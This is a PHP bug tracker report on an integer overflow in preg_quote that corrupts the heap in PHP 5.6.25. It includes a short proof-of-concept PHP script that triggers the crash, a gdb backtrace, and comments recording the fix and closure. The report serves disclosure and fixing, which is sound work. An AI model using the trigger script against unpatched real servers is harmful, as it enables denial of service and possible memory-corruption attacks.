|  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #72895 integer overflow in preg_quote caused heap corruption
Submitted: 2016-08-19 07:36 UTC Modified: 2017-02-13 01:29 UTC
From: minhrau dot vc dot 365 at gmail dot com Assigned: stas (profile)
Status: Closed Package: PCRE related
PHP Version: 5.6.25 OS: ALL
Private report: No CVE-ID: None
View Add Comment Developer Edit
Anyone can comment on a bug. Have a simpler test case? Does it work for you on a different platform? Let us know!
Just going to say 'Me too!'? Don't clutter the database with that please !
Your email address:
Solve the problem:
31 + 27 = ?
Subscribe to this entry?

 [2016-08-19 07:36 UTC] minhrau dot vc dot 365 at gmail dot com
Integer overflow in preg_quote lead to heap corruption:

static PHP_FUNCTION(preg_quote)
	out_str = safe_emalloc(4, in_str_len, 1); //// the result of out_str is the string with length > INT_MAX


Test script:

ini_set('memory_limit', -1);

$str = str_repeat('/', 0xffffffff/4)."/4";

$str1 = preg_quote($str, '/');

chunk_split($str1, 11, $str1);

Expected result:
No Crash

Actual result:
Starting program: /home/minhrau/PHP-5.6.25/sapi/cli/php testpreg_quote.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/".

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff10a2f78 in __memcpy_avx_unaligned () from /usr/lib/
(gdb) bt
#0  0x00007ffff10a2f78 in __memcpy_avx_unaligned () from /usr/lib/
#1  0x000000000085c3b3 in zif_chunk_split (ht=3, return_value=0x7ffff7fa0d00, return_value_ptr=0x7ffff7f6b0d8, this_ptr=0x0, return_value_used=0) at /home/minhrau/PHP-5.6.25/ext/standard/string.c:2218
#2  0x00000000009cc4a5 in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7f6b250) at /home/minhrau/PHP-5.6.25/Zend/zend_vm_execute.h:558
#3  0x00000000009d40d5 in ZEND_DO_FCALL_SPEC_CONST_HANDLER (execute_data=0x7ffff7f6b250) at /home/minhrau/PHP-5.6.25/Zend/zend_vm_execute.h:2602
#4  0x00000000009ca998 in execute_ex (execute_data=0x7ffff7f6b250) at /home/minhrau/PHP-5.6.25/Zend/zend_vm_execute.h:363
#5  0x00000000009cb384 in zend_execute (op_array=0x7ffff7f9f800) at /home/minhrau/PHP-5.6.25/Zend/zend_vm_execute.h:388
#6  0x0000000000986884 in zend_execute_scripts (type=8, retval=0x0, file_count=3) at /home/minhrau/PHP-5.6.25/Zend/zend.c:1341
#7  0x00000000008f77e0 in php_execute_script (primary_file=0x7fffffffe2b0) at /home/minhrau/PHP-5.6.25/main/main.c:2613
#8  0x0000000000aa9606 in do_cli (argc=2, argv=0x1381960) at /home/minhrau/PHP-5.6.25/sapi/cli/php_cli.c:994
#9  0x0000000000aaa654 in main (argc=2, argv=0x1381960) at /home/minhrau/PHP-5.6.25/sapi/cli/php_cli.c:1378


Add a Patch

Pull Requests

Add a Pull Request


AllCommentsChangesGit/SVN commitsRelated reports
 [2016-09-02 06:24 UTC]
-Assigned To: +Assigned To: stas
 [2016-09-02 06:24 UTC]
The fix is in security repo as 0f1eb74e92191e817b4198ceda4e8f093699da62 and in
please verify
 [2016-09-05 05:28 UTC] minhrau dot vc dot 365 at gmail dot com
Patch looks good.
 [2016-09-13 04:12 UTC]
-Status: Assigned +Status: Closed
 [2016-09-13 04:12 UTC]
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at

 For Windows:
Thank you for the report, and for helping us make PHP better.

 [2017-02-13 01:29 UTC]
-Type: Security +Type: Bug
PHP Copyright © 2001-2021 The PHP Group
All rights reserved.
Last updated: Thu Dec 09 09:03:33 2021 UTC